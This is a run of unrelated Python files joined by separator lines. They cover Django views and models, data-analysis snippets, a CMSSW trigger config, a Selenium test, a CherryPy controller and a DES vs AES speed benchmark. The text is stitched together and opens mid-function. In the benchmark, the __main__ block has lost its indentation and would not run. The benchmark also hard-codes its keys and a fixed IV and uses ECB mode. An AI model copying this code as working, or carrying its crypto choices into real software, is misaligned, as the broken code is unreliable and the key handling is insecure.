        form = ProductForm(request.POST, request.FILES)
        if form.is_valid():
            form.save()
            return redirect('home')
    return render(request, 'upload_form.html', {'upload_form': form})
def update_prod(request, prod_id):
    """Edit an existing product; unknown ids silently return home."""
    try:
        product = Products.objects.get(id=int(prod_id))
    except Products.DoesNotExist:
        return redirect('home')
    # Bound on POST (request.POST), unbound otherwise (None).
    form = ProductForm(request.POST or None, instance=product)
    if not form.is_valid():
        return render(request, 'upload_form.html', {'upload_form': form})
    form.save()
    return redirect('home')
def delete_prod(request, prod_id):
    """Delete the product with the given id, then return home.

    An unknown id is ignored (same redirect either way).
    """
    try:
        target = Products.objects.get(id=int(prod_id))
    except Products.DoesNotExist:
        pass
    else:
        target.delete()
    return redirect('home')
from django.contrib.auth import login, authenticate
from django.contrib.auth.forms import UserCreationForm
def register(request):
    """Sign up a new user and log them in immediately on success.

    GET renders an empty form; an invalid POST re-renders the bound form
    so validation errors are shown.
    """
    if request.method != 'POST':
        return render(request, 'signup.html', {'form': UserCreationForm()})
    form = UserCreationForm(request.POST)
    if form.is_valid():
        form.save()
        # Re-authenticate with the raw credentials, then open a session.
        user = authenticate(
            username=form.cleaned_data.get('username'),
            password=form.cleaned_data.get('password1'),
        )
        login(request, user)
        return redirect('/')
    return render(request, 'signup.html', {'form': form})
|
from textblob import TextBlob
from plotly.offline import plot
import plotly.graph_objs as go
import random
user1 = "Bob"
user2 = 'Alice'

# Expected chat line format: "<time> - <name>: <message>" — TODO confirm
# against the actual export format of chat_sample.txt.
with open('chat_sample.txt', 'r+') as f:
    samples = f.readlines()

# Per-user series of TextBlob sentiment polarities, in message order.
d = {user1:[], user2:[]}
for line in samples:
    time, *text = line.split('-')
    text = ''.join(text)
    name, *chat = text.split(':')
    t = TextBlob(''.join(chat))
    name = name.strip()
    if name == user1 or name == user2:
        d[name].append(t.sentiment.polarity)

# NOTE(review): trace1 caps at 9000 points and the color lists assume at most
# 9000/8000 messages per user — verify these magic numbers match the data,
# and that the string marker sizes are accepted by this plotly version.
trace1 = go.Scatter(
    y = d[user1][:9000],
    name = user1,
    mode = 'markers',
    marker=dict(
        size='8',
        colorscale='Picnic',
        color = random.sample(range(9000),9000),
    )
)
trace2 = go.Scatter(
    y = d[user2],
    name = user2,
    mode = 'markers',
    marker=dict(
        size='7',
        color = random.sample(range(8000), 8000),
        colorscale='Electric',
    )
)
# Render both scatter traces into an offline HTML plot.
data = [trace1, trace2]
plot(data)
# -*- coding: utf-8 -*-
import pandas as pd
## create empty df
df = pd.DataFrame()
# Populate the demo frame one column at a time.
df['name'] = ['Adam', 'Xavier', 'Ada']
df['employed'] = ['Yes', 'Yes', 'No']
df['age'] = [32,32,21]
## create a function
def mean_age_by_group(dataframe, col):
    """Group `dataframe` by `col` and return the per-group mean of numeric columns.

    Args:
        dataframe (pd.DataFrame): Input frame.
        col (str): Column label to group by.

    Returns:
        pd.DataFrame: One row per group with the mean of each numeric column.
    """
    # numeric_only=True: pandas >= 2.0 raises TypeError when non-numeric
    # columns (e.g. 'name') reach mean(); older pandas silently dropped them.
    return dataframe.groupby(col).mean(numeric_only=True)
## create a function
def uppercase_column_name(dataframe):
    """Upper-case every column label in place and hand the same frame back."""
    renamed = dataframe.columns.str.upper()
    dataframe.columns = renamed
    return dataframe
# Create a pipeline that applies both functions: first the grouped mean...
(df.pipe(mean_age_by_group,col='employed')
 # ...then upper-case the resulting column names.
 .pipe(uppercase_column_name))
|
import sqlite3
import pandas as pd

# Export every stored tweet, shuffled, to a text file for manual labeling.
conn = sqlite3.connect('tweets.db')
try:
    c = conn.cursor()
    c.execute('''
    SELECT * FROM normal_tweets
    ''')
    rows = c.fetchall()
finally:
    # Bug fix: the original never closed the connection (resource leak).
    conn.close()

df = pd.DataFrame(rows, columns=['id', 'datetime', 'tweet'])
# sample(n=len(df)) draws every row without replacement, i.e. a full shuffle.
sample = df.sample(len(df))
sample['tweet'].to_csv('data_labeling/FULL_label_data.txt')
import FWCore.ParameterSet.Config as cms

# CMSSW job: single-track analysis of PbPb data for a ladder of HLT
# full-track triggers, each feeding its own analyzer clone and path.
process = cms.Process("Demo")
process.Timing = cms.Service("Timing")

# Base analyzer; previous values of the tuned cuts are kept in the
# trailing comments.
process.ana_PbPb = cms.EDAnalyzer('singleTrackAnalyzer',
    vertexSrc = cms.string('hiSelectedVertex'),
    trackSrc = cms.InputTag('hiGeneralTracks'),
    pfCandSrc = cms.untracked.InputTag('particleFlowTmp'),
    doCaloMatched = cms.untracked.bool(True),
    reso = cms.untracked.double(0.5),#0.2
    offlineDCA = cms.untracked.double(3.0),#3.0
    offlineChi2 = cms.untracked.double(0.15),#0.15
    offlineptErr = cms.untracked.double(0.1),#0.05
    offlinenhits = cms.untracked.double(11)#10
)

### standard includes
process.load('Configuration.StandardSequences.Services_cff')
process.load('SimGeneral.HepPDTESSource.pythiapdt_cfi')
process.load('FWCore.MessageService.MessageLogger_cfi')
process.load('Configuration.EventContent.EventContentHeavyIons_cff')
process.load('SimGeneral.MixingModule.mixNoPU_cfi')
process.load('Configuration.StandardSequences.GeometryRecoDB_cff')
process.load('Configuration.StandardSequences.MagneticField_38T_PostLS1_cff')
process.load('Configuration.StandardSequences.RawToDigi_cff')
process.load('Configuration.StandardSequences.L1Reco_cff')
process.load('Configuration.StandardSequences.ReconstructionHeavyIons_cff')
process.load('Configuration.StandardSequences.EndOfProcess_cff')
#process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')

### conditions
#from Configuration.AlCa.GlobalTag import GlobalTag
#process.GlobalTag = GlobalTag(process.GlobalTag, '75X_mcRun2_HeavyIon_v1','')

process.options = cms.untracked.PSet( wantSummary =
cms.untracked.bool(True) )
# -1 = process every event in the input files.
process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32( -1 ) )
process.source = cms.Source("PoolSource",
    fileNames = cms.untracked.vstring(
#'root://xrootd3.cmsaf.mit.edu//store/user/qwang/HIHardProbes/HIHardProbes_FullTrackSkim2015_v3/151216_192437/0000/FullTrack_1.root'
#'root://xrootd3.cmsaf.mit.edu//store/user/qwang/HIHardProbes/HIHardProbes_FullTrackSkim2015_v3/151216_192437/0000/FullTrack_10.root'
'/store/user/qwang/HIHardProbes/HIHardProbes_FullTrackSkim2015_v3/151216_192437/0000/FullTrack_100.root'
))

import HLTrigger.HLTfilters.hltHighLevel_cfi
# Generic HLT filter; cloned below once per trigger selection.
process.hltHM = HLTrigger.HLTfilters.hltHighLevel_cfi.hltHighLevel.clone(
    TriggerResultsTag = cms.InputTag("TriggerResults","","HLT")
)
process.hltMB = process.hltHM.clone()
process.hltMB.HLTPaths = ['HLT_HIL1MinimumBiasHF1AND_v1']
process.hltMB.andOr = cms.bool(True)#Flase OR
process.hltMB.throw = cms.bool(False)

process.hltHM1 = process.hltHM.clone()
process.hltHM2 = process.hltHM.clone()
process.hltHM3 = process.hltHM.clone()
process.hltHM4 = process.hltHM.clone()
process.hltHM5 = process.hltHM.clone()

##### PbPb HLTSingleTrack ######
process.hltHM1.HLTPaths = ['HLT_HIFullTrack12_L1MinimumBiasHF1_AND_v1']
process.hltHM2.HLTPaths = ['HLT_HIFullTrack18_L1MinimumBiasHF1_AND_v1']
process.hltHM3.HLTPaths = ['HLT_HIFullTrack24_v1']
process.hltHM4.HLTPaths = ['HLT_HIFullTrack34_v1']
process.hltHM5.HLTPaths = ['HLT_HIFullTrack45_v1']

# andOr=True -> accept if ANY listed path fired; throw=False -> a missing
# path is ignored instead of aborting the job.
process.hltHM1.andOr = cms.bool(True)
process.hltHM1.throw = cms.bool(False)
process.hltHM2.andOr = cms.bool(True)
process.hltHM2.throw = cms.bool(False)
process.hltHM3.andOr = cms.bool(True)
process.hltHM3.throw = cms.bool(False)
process.hltHM4.andOr = cms.bool(True)
process.hltHM4.throw = cms.bool(False)
process.hltHM5.andOr = cms.bool(True)
process.hltHM5.throw = cms.bool(False)

# One analyzer clone per selection so the output histograms stay separate.
process.ana_PbPb0 = process.ana_PbPb.clone()
process.ana_PbPb1 = process.ana_PbPb.clone()
process.ana_PbPb2 = process.ana_PbPb.clone()
process.ana_PbPb3 = process.ana_PbPb.clone()
process.ana_PbPb4 = process.ana_PbPb.clone()
process.ana_PbPb5 = process.ana_PbPb.clone()
process.ana_PbPb6 = process.ana_PbPb.clone()
process.ana_PbPb7 = process.ana_PbPb.clone()
process.ana_PbPb8 = process.ana_PbPb.clone()
process.ana_PbPb9 = process.ana_PbPb.clone()

# d*: single-trigger paths; p*: paths requiring two triggers in coincidence.
process.d0 = cms.Path( process.hltMB*process.ana_PbPb0 )
process.d1 = cms.Path( process.hltHM1*process.ana_PbPb1 )
process.d2 = cms.Path( process.hltHM2*process.ana_PbPb2 )
process.d3 = cms.Path( process.hltHM3*process.ana_PbPb3 )
process.d4 = cms.Path( process.hltHM4*process.ana_PbPb4 )
process.p0 = cms.Path( process.hltMB*process.hltHM1*process.ana_PbPb5 )
process.p1 = cms.Path( process.hltHM1*process.hltHM2*process.ana_PbPb6 )
process.p2 = cms.Path( process.hltHM2*process.hltHM3*process.ana_PbPb7 )
process.p3 = cms.Path( process.hltHM3*process.hltHM4*process.ana_PbPb8 )
process.p4 = cms.Path( process.hltHM4*process.hltHM5*process.ana_PbPb9 )

process.schedule = cms.Schedule(process.d0,process.d1,process.d2,process.d3,process.d4,process.p0,process.p1,process.p2,process.p3,process.p4)
process.TFileService = cms.Service("TFileService",fileName = cms.string("singletrack.root"))
|
import sys
import numpy as np

seed = 1
np.random.seed(seed)

# Command line: <pfam_id> <ipdb index>, e.g. "PF00008 0".
#pfam_id = 'PF00008'
#ipdb = 0
pfam_id = sys.argv[1]
ipdb = int(sys.argv[2])
ext_name = '%s/%02d' % (pfam_id, ipdb)

# Bug fix: the original wrapped loadtxt in a bare `except: pass`, which left
# `ct` undefined and crashed later with a NameError; fail fast instead.
try:
    ct = np.loadtxt('%s_ct.dat' % ext_name)
except OSError as exc:
    sys.exit('Cannot read contact map %s_ct.dat: %s' % (ext_name, exc))

#=========================================================================================
# Binarize the contact map at several distance thresholds and save the
# contacting residue-pair indices for each threshold.
thresholds = [2., 4., 6., 8., 10]
for threshold in thresholds:
    ct1 = ct.copy()
    np.fill_diagonal(ct1, 1000)  # exclude self-contacts from thresholding
    # Pairs at or below the threshold become 1, everything else 0.
    top_pos = ct1 <= threshold
    ct1[top_pos] = 1.
    ct1[~top_pos] = 0.
    xy = np.argwhere(ct1 == 1)
    np.savetxt('%s_contact_%02d.dat' % (ext_name, threshold), xy, fmt='% i')
|
# Generated by Django 3.1.5 on 2021-01-29 17:05
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion


class Migration(migrations.Migration):
    # Auto-generated schema migration: makes film.creator nullable/blank and
    # keeps the FK row on user deletion (DO_NOTHING). Avoid hand-editing
    # generated migrations; create a follow-up migration instead.

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('films', '0006_film_creator'),
    ]

    operations = [
        migrations.AlterField(
            model_name='film',
            name='creator',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='posted_films', to=settings.AUTH_USER_MODEL),
        ),
    ]
|
class Node:
    """A graph vertex: id, weight, color/tag scratch fields, adjacency maps
    and an optional position/parent used by graph algorithms."""

    def __init__(self, id: int, tag: bool = False, weight: float = 0.0, color: str = "white",
                 nodesIn: dict = None, nodesOut: dict = None, position: tuple = None, parent=None):
        # NOTE: `id` shadows the builtin, but the parameter name is part of
        # the public interface and is kept.
        self.id = id
        self.tag = tag
        # Annotation fix: the default 0.0 is a float, so the parameter is
        # typed float (was `int`).
        self.weight = weight
        self.color = color
        # None defaults avoid the shared-mutable-default pitfall: each node
        # gets its own fresh dict when no mapping is supplied.
        if nodesIn is None:
            self.nodesIn = {}
        else:
            self.nodesIn = nodesIn  # (key = int , value = weight)
        if nodesOut is None:
            self.nodesOut = {}
        else:
            self.nodesOut = nodesOut  # (key = int , value = weight)
        self.position = position
        self.parent = parent

    def getKey(self) -> int:
        """Return the node id."""
        return self.id

    def getTag(self) -> bool:
        return self.tag

    def setTag(self, tag):
        self.tag = tag

    def getPos(self) -> tuple:
        return self.position

    def setPos(self, p):
        self.position = p

    def getColor(self) -> str:
        return self.color

    def setColor(self, c):
        self.color = c

    def getWeight(self) -> float:
        return self.weight

    def setWeight(self, w):
        self.weight = w

    def repr_json(self):
        """Return the attribute dict for JSON serialization."""
        return self.__dict__

    def getParent(self):
        return self.parent

    def setParent(self, p):
        self.parent = p

    def __repr__(self):
        return str(self.__dict__)

    def __eq__(self, other) -> bool:
        # Equality is by id and position only (other fields are scratch state).
        return self.id == other.id and self.position == other.position

    def __lt__(self, other):
        # Order by (weight, id) so ties on weight break deterministically.
        p = (self.weight, self.id)
        h = (other.getWeight(), other.getKey())
        return p < h
|
#!/usr/bin/python
""" This program will search "pycon" keyword on provided site and validate test as per search result. """
import unittest
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
class pythonorgserach(unittest.TestCase):
    # Selenium smoke test: search python.org for "pycon" and check results.
    # NOTE(review): class name has a typo ("serach"); kept because renaming
    # could affect name-based test selection.

    def setUp(self):
        """set geckodriver bin file path """
        # Hard-coded local path to the geckodriver binary — machine-specific.
        self.driver = webdriver.Firefox(executable_path = "/home/devi/web/geckodriver")

    def test_search_in_python_org(self):
        # Load the site, submit a search, and assert results came back.
        driver = self.driver
        driver.get("https://www.python.org/")
        self.assertIn("Python", driver.title)
        ele = driver.find_element_by_name("q")
        ele.send_keys("pycon")
        ele.send_keys(Keys.RETURN)
        assert "No results found" not in driver.page_source

    def tearDown(self):
        # Always release the browser, even when the test fails.
        self.driver.quit()

if __name__ == "__main__":
    unittest.main()
|
import tensorflow as tf

# NOTE(review): this uses the TensorFlow 1.x graph/session API (tf.Session,
# tf.div); it will not run under TF 2.x without tf.compat.v1.
x1 = tf.add(4,8,)        # 12
x2 = tf.multiply(x1,5)   # 60
x3 = tf.add(12,6,)       # 18
x4 = tf.multiply(x3,x2)  # 1080
x5 = tf.div(x4,2)        # 540

# Evaluate the graph and print the result.
with tf.Session() as sess:
    output = sess.run(x5)
    print(output)

# Second session: evaluate again while also dumping the graph for TensorBoard.
with tf.Session() as sess:
    outnew=tf.summary.FileWriter("./logs/add",sess.graph) #tensorboard --logdir=logs
    print(sess.run(x5))
    outnew.close()
|
from unittest import TestCase
from django.conf import settings
from django_dynamic_fixture import decorators
class SkipForDatabaseTest(TestCase):
    # NOTE(review): despite its name, this case exercises the
    # @only_for_database decorator (and OnlyForDatabaseTest below exercises
    # @skip_for_database) — the two class names look swapped; confirm intent.

    def setUp(self):
        self.it_was_executed = False

    def tearDown(self):
        # It is important to do not break others tests: global and shared variable
        decorators.DATABASE_ENGINE = settings.DATABASES['default']['ENGINE']

    @decorators.only_for_database(decorators.POSTGRES)
    def method_postgres(self):
        self.it_was_executed = True

    def test_annotated_method_only_for_postgres(self):
        # Under SQLite the decorated method must be skipped...
        decorators.DATABASE_ENGINE = decorators.SQLITE3
        self.method_postgres()
        assert self.it_was_executed is False
        # ...and under Postgres it must run.
        decorators.DATABASE_ENGINE = decorators.POSTGRES
        self.method_postgres()
        assert self.it_was_executed
class OnlyForDatabaseTest(TestCase):
    # NOTE(review): exercises @skip_for_database — see the naming remark on
    # the sibling class; the two class names appear swapped.

    def setUp(self):
        self.it_was_executed = False

    def tearDown(self):
        # It is important to do not break others tests: global and shared variable
        decorators.DATABASE_ENGINE = settings.DATABASES['default']['ENGINE']

    @decorators.skip_for_database(decorators.SQLITE3)
    def method_sqlite3(self):
        self.it_was_executed = True

    def test_annotated_method_skip_for_sqlite3(self):
        # Skipped on the engine it is annotated against (SQLite)...
        decorators.DATABASE_ENGINE = decorators.SQLITE3
        self.method_sqlite3()
        assert self.it_was_executed is False
        # ...and executed on any other engine.
        decorators.DATABASE_ENGINE = decorators.POSTGRES
        self.method_sqlite3()
        assert self.it_was_executed
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#****************************************************************#
# ScriptName: test.py
# Author:
# Create Date: 2014-03-07
# Modify Author:
# Modify Date: 2014-03-07
# Function:
#***************************************************************#
import execs
import random
def conf_grid():
    """Append the Oracle Grid (ASM) environment exports to the grid user's
    ~/.bash_profile and fix ownership of the grid home directory.
    """
    cmd = ["export ORACLE_BASE=/opt/ogrid",
           "export ORACLE_HOME=/opt/grid/products/11.2.0",
           "export PATH=$PATH:$ORACLE_HOME/bin",
           "export ORACLE_SID=+ASM1",
           "export PATH=$PATH:$ORACLE_HOME/bin",
           "umask 022"]
    # Fix: use a context manager so the file is closed even on error (the
    # original relied on a manual close and had a stray semicolon).
    with open('/home/grid/.bash_profile', 'a') as f:
        for line in cmd:
            f.write(line + "\n")
    # NOTE(review): `source` in a child process cannot modify this process's
    # environment — presumably kept for validation/side effects; verify.
    (stdout, stderr) = execs.call("source /home/grid/.bash_profile")
    (stdout, stderr) = execs.call("chown -R grid:oinstall /home/grid")
    # print() with a single argument works under both Python 2 and 3.
    print("grid profile is config \033[1;32;40m ok\033[0m ")

if __name__ == "__main__":
    conf_grid()
|
from .auth import require
from .common import CommonController
import cherrypy
import simplejson
class Table(CommonController):
    """CherryPy controller exposing CRUD pages for a key/value table model."""

    # Sessions + the auth tool are applied to every handler in this controller.
    _cp_config = {
        'tools.sessions.on': True,
        'tools.auth.on': True
    }

    @cherrypy.expose
    @require()
    def list(self):
        # Render the full table listing.
        table=self.model.get_list()
        data=dict(module_template='table.jinja', table=table)
        return self.render(data)

    @cherrypy.expose
    @require()
    def edit(self, value):
        # Show a single item as tab-indented JSON for editing.
        content=self.model.get_item(value)
        str_content = simplejson.dumps(content, indent="\t")
        data=dict(module_template='detail.jinja', key=value, value=str_content)
        return self.render(data)

    @cherrypy.expose
    @require()
    def save(self, key, value, control):
        # Persist only when the submitted control is "store".
        if control == "store":
            content = simplejson.loads(value)
            self.model.set_item(key, content)
        # NOTE(review): indentation was lost in this copy — confirm whether
        # the redirect belongs inside the `if` or (as restored here) always runs.
        raise cherrypy.HTTPRedirect("/table/list")

    @cherrypy.expose
    @require()
    def remove(self, value):
        self.model.remove_item(value)
        raise cherrypy.HTTPRedirect("/table/list")

    @cherrypy.expose
    def __call__(self):
        # Default view: render the table template without data.
        data=dict(module_template='table.jinja')
        return self.render(data)

    def __init__(self, model):
        self.model = model
        super(Table, self).__init__()
|
"""
This script is used to test the performance between DES and AES.
The requirement library includes numpy, pycrypto, and matplotlib
"""
import os
import time
import numpy as np
import matplotlib.pyplot as plt
from Crypto.Cipher import AES
from Crypto.Cipher import DES
from des_algorithm import * # import my des algorithm library
__author__ = "Liu Dairui"
def encryption(text, algorithm, mode):
    """Encrypt `text` with the chosen algorithm ("DES"/"AES") and mode ("ECB"/"CBC").

    Returns:
        tuple: (ciphertext, seconds spent encrypting).

    Note: pad_text/str2ascii come from des_algorithm (star import); des_key,
    aes_key and IV are module-level globals assigned in __main__.
    """
    start_time = time.time()
    if algorithm == "DES":
        if mode == "ECB":
            # DES ECB mode encrypt data
            k = DES.new(des_key, DES.MODE_ECB)
            value = k.encrypt(pad_text(str2ascii(text)))
        else:
            # DES CBC mode encrypt data
            k = DES.new(des_key, DES.MODE_CBC, IV=IV)
            value = k.encrypt(pad_text(str2ascii(text)))
    else:
        if mode == "ECB":
            # AES ECB mode encrypt data
            k = AES.new(aes_key, AES.MODE_ECB)
            value = k.encrypt(pad_text_aes(str2ascii(text)))
        else:
            # AES CBC mode encrypt data (fixed, hard-coded 16-byte IV)
            k = AES.new(aes_key, AES.MODE_CBC, "This is an IV456")
            value = k.encrypt(pad_text_aes(str2ascii(text)))
    return value, time.time() - start_time
def decryption(text, algorithm, mode):
    # decrypt data using corresponding algorithm and mode
    """Decrypt `text` with the chosen algorithm/mode and return the elapsed
    seconds (the plaintext itself is discarded — only timing matters here).
    """
    start_time = time.time()
    if algorithm == "DES":
        if mode == "ECB":
            k = DES.new(des_key, DES.MODE_ECB)
            k.decrypt(text)
        else:
            k = DES.new(des_key, DES.MODE_CBC, IV=IV)
            k.decrypt(text)
    else:
        if mode == "ECB":
            k = AES.new(aes_key, AES.MODE_ECB)
            k.decrypt(text)
        else:
            # Must match the fixed IV used in encryption().
            k = AES.new(aes_key, AES.MODE_CBC, "This is an IV456")
            k.decrypt(text)
    return time.time() - start_time
def pad_text_aes(text):
    """PKCS#7-pad `text` to a multiple of the 16-byte AES block size
    (a full extra block is appended when the length already divides 16)."""
    fill = 16 - len(text) % 16
    padding = bytes([fill]) * fill
    return text + padding
def start(r, algorithm, mode):
    # calculate encryption and decryption time
    """Benchmark encrypt+decrypt for data sizes 1..r-1 MB (stride `step`).

    Returns:
        tuple(list, list): mean encryption and mean decryption times, one
        entry per size; each entry averages 10 runs. `step` is a
        module-level global assigned in __main__.
    """
    times_en, times_de = [], []
    for size in range(1, r, step):
        time_en, time_de = [], []
        # calculate 10 times and average the result
        for _ in range(10):
            data = generate_data(size)
            text, tmp = encryption(data, algorithm, mode)
            time_en.append(tmp)
            tmp = decryption(text, algorithm, mode)
            time_de.append(tmp)
            del data  # release the multi-MB buffer before the next run
        times_en.append(np.mean(time_en))
        times_de.append(np.mean(time_de))
        print("{} with {} deal with {}MB data cost: {}s.".format(algorithm, mode, size, times_en[-1] + times_de[-1]))
    print("{} with {} finished.".format(algorithm, mode))
    return times_en, times_de
def generate_data(size):
    """Return `size` MiB of random bytes, hex-encoded (so 2*size MiB of text)."""
    n_bytes = 1024 * 1024 * size
    return os.urandom(n_bytes).hex()
if __name__ == "__main__":
# the default algorithm and mode chosen here
algorithms = ["DES", "AES"]
modes = ["ECB", "CBC"]
aes_key = "Sixteen byte key"
des_key = "00000000"
IV = "00000000"
rounds, step = 102, 16
fig_en = plt.figure()
fig_de = plt.figure()
ax_en = fig_en.add_subplot(111)
ax_de = fig_de.add_subplot(111)
for a in algorithms:
for m in modes:
t_e, t_d = start(rounds, a, m)
ax_en.plot(range(1, rounds, step), t_e, marker='o', linestyle="--", linewidth=0.5,
label="{}+{}".format(a, m))
ax_de.plot(range(1, rounds, step), t_d, marker='o', linestyle="--", linewidth=0.5,
label="{}+{}".format(a, m))
del t_e, t_d
ax_en.legend()
ax_de.legend()
plt.sca(ax_en)
plt.title("Performance comparison between DES and AES: Encryption")
plt.xlabel("Data Block size(MB)")
plt.ylabel("Time(s)")
plt.sca(ax_de)
plt.title("Performance comparison between DES and AES: Decryption")
plt.xlabel("Data Block size(MB)")
plt.ylabel("Time(s)")
fig_en.savefig("DESvsAES_encryption.png")
fig_de.savefig("DESvsAES_decryption.png")
plt.show()
|
from django.db import models
from accounts.models import User
from cmdb.models.base import IDC
from cmdb.models.asset import Server, NetDevice
class CPU(models.Model):
    # CPU accessory, e.g. "Intel(R) Xeon(R) Gold 5118 CPU @ 2.30GHz".
    version = models.CharField('型号版本', max_length=100, unique=True)  # model/version string
    speed = models.PositiveSmallIntegerField('频率MHz')  # clock speed, MHz
    process = models.PositiveSmallIntegerField('线程数')  # thread count
    created_date = models.DateTimeField('创建时间', auto_now_add=True)

    class Meta:
        db_table = 'cmdb_acc_cpu'
        verbose_name = u'配件CPU表'
        verbose_name_plural = u'配件CPU表'
class Memory(models.Model):
    # RAM accessory; a (type, size, speed) combination is unique.
    ram_type = models.CharField('内存类型', max_length=4, choices=(('ddr3', 'DDR3'), ('ddr4', 'DDR4'), ('ddr5', 'DDR5')))
    ram_size = models.PositiveSmallIntegerField('内存容量(G)')  # capacity, GB
    speed = models.PositiveSmallIntegerField('速率(MT/s)')  # transfer rate, MT/s
    created_date = models.DateTimeField('创建时间', auto_now_add=True)

    class Meta:
        db_table = 'cmdb_acc_memory'
        unique_together = ('ram_type', 'ram_size', 'speed')
        verbose_name = u'配件内存表'
        verbose_name_plural = u'配件内存表'
class Disk(models.Model):
    # Hard-drive accessory; (type, capacity, rpm, dimensions) is unique.
    device_type = models.CharField('硬盘类型', max_length=4, choices=(('sata', 'SATA'), ('sas', 'SAS'), ('ssd', 'SSD')))
    capacity = models.PositiveSmallIntegerField('容量(G)')  # capacity, GB
    rpm = models.PositiveSmallIntegerField('转率')  # rotation speed
    dimensions = models.CharField('尺寸(英寸)', max_length=3, choices=(('2.5', '2.5寸'), ('3.5', '3.5寸')))  # form factor, inches
    created_date = models.DateTimeField('创建时间', auto_now_add=True)

    class Meta:
        db_table = 'cmdb_acc_disk'
        unique_together = ('device_type', 'capacity', 'rpm', 'dimensions')
        verbose_name = u'配件硬盘表'
        verbose_name_plural = u'配件硬盘表'
class Caddy(models.Model):
    # Drive caddy/tray accessory, identified solely by its form factor.
    caddy_dimensions = {
        '2.5s': '2.5寸 R740', '2.5': '2.5寸', '3.5': '3.5寸'
    }
    dimensions = models.CharField('尺寸(英寸)', max_length=4, choices=caddy_dimensions.items(), unique=True)
    created_date = models.DateTimeField('创建时间', auto_now_add=True)

    class Meta:
        db_table = 'cmdb_acc_caddy'
        verbose_name = u'配件硬盘托架表'
        verbose_name_plural = u'配件硬盘托架表'
class NetworkAdapter(models.Model):
    # NIC accessory, identified by its link speed (100M/1G/10G).
    speed = models.CharField('网卡速率', max_length=6, choices=(('100MbE', '百兆'), ('GbE', '千兆'), ('10GbE', '万兆')), unique=True)
    created_date = models.DateTimeField('创建时间', auto_now_add=True)

    class Meta:
        db_table = 'cmdb_acc_network_adapter'
        verbose_name = u'配件网卡表'
        verbose_name_plural = u'配件网卡表'
# Spare-part stock model: Ethernet cable SKU (category + length).
class NetworkCable(models.Model):
    cat = models.CharField('网线类型', max_length=2, choices=(('5', '5类线'), ('5e', '超5类线'), ('6', '6类线'), ('6e', '超6类线')))
    length = models.PositiveSmallIntegerField('长度(米)')
    created_date = models.DateTimeField('创建时间', auto_now_add=True)
    class Meta:
        db_table = 'cmdb_acc_network_cable'
        unique_together = ('cat', 'length')
        verbose_name = u'配件网线表'
        verbose_name_plural = u'配件网线表'
# Small form-factor pluggable (SFP) optical transceiver module
class OpticalTransceiver(models.Model):
    """
    Example vendor datasheet fields this model summarises:

    Mfg. Compatibility: Cisco
    Part Number: SFP-10G-LR-10pk
    Form Factor: SFP+
    TX Wavelength: 1310nm
    Reach: 10km
    Cable Type: SMF
    Rate Category: 10GBase
    Interface Type: LR
    DDM: Yes
    Connector Type: Dual-LC
    """
    information = models.CharField('综述介绍', max_length=20, blank=True, null=True)
    mode = models.CharField('模式', max_length=6, choices=(('single', '单模'), ('multi', '多模')))
    reach = models.FloatField('最大传输距离(km)')
    rate = models.CharField('传输速率', max_length=6, choices=(('100MbE', '百兆'), ('GbE', '千兆'), ('10GbE', '万兆')))
    image = models.ImageField(u'图片', upload_to='images/accessory/%Y%m%d', null=True, blank=True)
    created_date = models.DateTimeField('创建时间', auto_now_add=True)
    class Meta:
        db_table = 'cmdb_acc_optical_transceiver'
        unique_together = ('mode', 'reach', 'rate')
        verbose_name = u'配件光模块表'
        verbose_name_plural = u'配件光模块表'
# Spare-part stock model: fibre patch (jump) cable SKU.
class JumpWire(models.Model):
    information = models.CharField('综述介绍', max_length=20, blank=True, null=True)
    mode = models.CharField('模式', max_length=6, choices=(('single', '单模'), ('multi', '多模')))
    # Connector type: LC (small square), SC (large square), FC (round).
    interface = models.CharField('光纤接口', max_length=6, choices=(('lc', '小方头'), ('sc', '大方头'), ('fc', '圆头')))
    length = models.PositiveSmallIntegerField('长度(米)')
    image = models.ImageField(u'图片', upload_to='images/accessory/%Y%m%d', null=True, blank=True)
    created_date = models.DateTimeField('创建时间', auto_now_add=True)
    class Meta:
        db_table = 'cmdb_acc_jump_wire'
        unique_together = ('mode', 'interface', 'length')
        verbose_name = u'配件跳线表'
        verbose_name_plural = u'配件跳线表'
# Accessory category codes -> Chinese display labels.
# Shared by Accessory.mode and InventoryRecord.accessory choices.
accessory_item = {
    'cpu': 'CPU', 'memory': '内存', 'disk': '硬盘', 'caddy': '硬盘托架', 'network_adapter': '网卡', 'network_cable': '网线',
    'transceiver': '光模块', 'jump_wire': '跳线'
}
# One physical accessory unit in stock; points at its SKU row via
# (mode, mode_id) — a manual, untyped reference into one of the tables above.
class Accessory(models.Model):
    storehouse = models.ForeignKey(IDC, on_delete=models.CASCADE, help_text='仓库')
    mode = models.CharField('配件类型', max_length=20, choices=accessory_item.items())
    # Primary key of the row in the table selected by `mode` (no FK constraint).
    mode_id = models.IntegerField('配件型号表主键ID')
    manufacturer = models.CharField('硬件制造商', max_length=20, blank=True, null=True)
    sn = models.CharField('Serial Number', max_length=50, blank=True, null=True)
    vendor = models.CharField('采购渠道(供应商)', max_length=20)
    trade_date = models.DateField('采购时间', blank=True, null=True)
    expired_date = models.DateField('过保时间', blank=True, null=True)
    comment = models.CharField('备注', max_length=50, blank=True, null=True)
    is_active = models.BooleanField('是否可用', default=True)
    created_date = models.DateTimeField('创建时间', auto_now_add=True)
    class Meta:
        db_table = 'cmdb_acc_accessory'
        verbose_name = u'配件详细表'
        verbose_name_plural = u'配件详细表'
class UseRecord(models.Model):
    """Install/remove history: which asset (server or network device) an
    accessory was fitted to. (原注释: CPU、内存、硬盘、网卡、光模块 配件,
    需要知道被哪个资产使用.)"""
    accessory = models.ForeignKey(Accessory, on_delete=models.CASCADE, help_text='配件')
    # Exactly one of server / net_device is expected to be set — not enforced here.
    server = models.ForeignKey(Server, on_delete=models.CASCADE, help_text='服务器', blank=True, null=True)
    net_device = models.ForeignKey(NetDevice, on_delete=models.CASCADE, help_text='网络设备', blank=True, null=True)
    operate = models.CharField('操作', max_length=7, choices=(('install', '安装'), ('remove', '取下')), default='install')
    created_date = models.DateTimeField('创建时间', auto_now_add=True)
    class Meta:
        db_table = 'cmdb_acc_use_record'
        verbose_name = u'配件使用记录表'
        verbose_name_plural = u'配件使用记录表'
